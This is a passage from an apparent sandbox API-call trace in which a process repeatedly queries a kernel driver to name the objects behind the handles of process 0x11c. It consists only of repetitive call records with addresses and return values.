nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0245.126] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.127] PsAcquireProcessExitSynchronization () returned 0x0 [0245.127] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.127] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037dbf20, HandleInformation=0x0) returned 0x0 [0245.127] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.127] PsReleaseProcessExitSynchronization () returned 0x2 [0245.127] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.127] ObQueryNameString (in: Object=0xfffffa80037dbf20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.127] ObfDereferenceObject (Object=0xfffffa80037dbf20) returned 0x3 [0245.127] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.127] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.127] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.127] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.127] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.127] PsAcquireProcessExitSynchronization () returned 0x0 [0245.127] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.127] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed7f20, HandleInformation=0x0) returned 0x0 [0245.127] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.127] PsReleaseProcessExitSynchronization () returned 0x2 [0245.127] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.127] ObQueryNameString (in: Object=0xfffffa8001ed7f20, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.127] ObfDereferenceObject (Object=0xfffffa8001ed7f20) returned 0x2 [0245.127] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.127] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.127] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0245.128] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.128] PsAcquireProcessExitSynchronization () returned 0x0 [0245.128] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.128] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ee2160, HandleInformation=0x0) returned 0x0 [0245.128] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.128] PsReleaseProcessExitSynchronization () returned 0x2 [0245.128] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.128] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.128] ObfDereferenceObject (Object=0xfffffa8002ee2160) returned 0x1 [0245.128] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.128] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.128] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0245.128] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.128] PsAcquireProcessExitSynchronization () returned 0x0 [0245.128] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.128] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80027dfe80, HandleInformation=0x0) returned 0x0 [0245.128] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.128] PsReleaseProcessExitSynchronization () returned 0x2 [0245.128] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.128] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.128] ObfDereferenceObject (Object=0xfffffa80027dfe80) returned 0x1 [0245.128] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.128] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.128] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.129] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.129] PsAcquireProcessExitSynchronization () returned 0x0 [0245.129] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.129] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003996980, HandleInformation=0x0) returned 0x0 [0245.129] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.129] PsReleaseProcessExitSynchronization () returned 0x2 [0245.129] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.129] ObQueryNameString (in: Object=0xfffffa8002821370, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.129] ObfDereferenceObject (Object=0xfffffa8003996980) returned 0x1 [0245.129] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.129] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.129] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.129] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0245.129] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.129] PsAcquireProcessExitSynchronization () returned 0x0 [0245.129] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.129] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003997d10, HandleInformation=0x0) returned 0x0 [0245.129] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.129] PsReleaseProcessExitSynchronization () returned 0x2 [0245.129] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.129] ObQueryNameString (in: Object=0xfffffa80037f6060, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.129] ObfDereferenceObject (Object=0xfffffa8003997d10) returned 0x1 [0245.129] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.129] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.130] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.130] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.130] PsAcquireProcessExitSynchronization () returned 0x0 [0245.130] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.130] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039973e0, HandleInformation=0x0) returned 0x0 [0245.130] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.130] PsReleaseProcessExitSynchronization () returned 0x2 [0245.130] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.130] ObQueryNameString (in: Object=0xfffffa80039973e0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.130] ObfDereferenceObject (Object=0xfffffa80039973e0) returned 0x1 [0245.130] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.130] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.130] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.130] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.130] PsAcquireProcessExitSynchronization () returned 0x0 [0245.130] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.131] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003998260, HandleInformation=0x0) returned 0x0 [0245.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.131] PsReleaseProcessExitSynchronization () returned 0x2 [0245.131] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.131] ObQueryNameString (in: Object=0xfffffa8003998260, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.131] ObfDereferenceObject (Object=0xfffffa8003998260) returned 0x1 [0245.131] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.131] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.131] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.131] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.131] PsAcquireProcessExitSynchronization () returned 0x0 [0245.131] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.131] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039963d0, HandleInformation=0x0) returned 0x0 [0245.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.131] PsReleaseProcessExitSynchronization () returned 0x2 [0245.131] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.131] ObQueryNameString (in: Object=0xfffffa80039963d0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.131] ObfDereferenceObject (Object=0xfffffa80039963d0) returned 0x2 [0245.131] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.131] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.131] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.131] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.131] PsAcquireProcessExitSynchronization () returned 0x0 [0245.131] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.131] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800399da20, HandleInformation=0x0) returned 0x0 [0245.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.131] PsReleaseProcessExitSynchronization () returned 0x2 [0245.131] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.132] ObQueryNameString (in: Object=0xfffffa800399da20, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.132] ObfDereferenceObject (Object=0xfffffa800399da20) returned 0x1 [0245.132] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.132] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.132] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.132] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.132] PsAcquireProcessExitSynchronization () returned 0x0 [0245.132] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.132] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800399d780, HandleInformation=0x0) returned 0x0 [0245.132] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.132] PsReleaseProcessExitSynchronization () returned 0x2 [0245.132] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.132] ObQueryNameString (in: Object=0xfffffa800399d780, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.132] ObfDereferenceObject (Object=0xfffffa800399d780) returned 0x2 [0245.132] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.132] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.132] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.132] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.132] PsAcquireProcessExitSynchronization () returned 0x0 [0245.132] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.132] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800399d630, HandleInformation=0x0) returned 0x0 [0245.132] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.132] PsReleaseProcessExitSynchronization () returned 0x2 [0245.132] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.132] ObQueryNameString (in: Object=0xfffffa800399d630, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.132] ObfDereferenceObject (Object=0xfffffa800399d630) returned 0x1 [0245.132] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.133] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.133] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.133] PsAcquireProcessExitSynchronization () returned 0x0 [0245.133] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.133] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.133] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.133] PsReleaseProcessExitSynchronization () returned 0x2 [0245.133] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.133] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.133] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.133] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.133] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.133] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.133] PsAcquireProcessExitSynchronization () returned 0x0 [0245.133] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.133] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.133] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.133] PsReleaseProcessExitSynchronization () returned 0x2 [0245.133] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.133] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.133] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.133] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.133] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0245.134] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.134] PsAcquireProcessExitSynchronization () returned 0x0 [0245.134] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.134] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a04b90, HandleInformation=0x0) returned 0x0 [0245.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.134] PsReleaseProcessExitSynchronization () returned 0x2 [0245.134] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.134] ObQueryNameString (in: Object=0xfffffa8003a04b90, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.134] ObfDereferenceObject (Object=0xfffffa8003a04b90) returned 0x1 [0245.134] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.134] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.134] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0245.134] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.134] PsAcquireProcessExitSynchronization () returned 0x0 [0245.134] 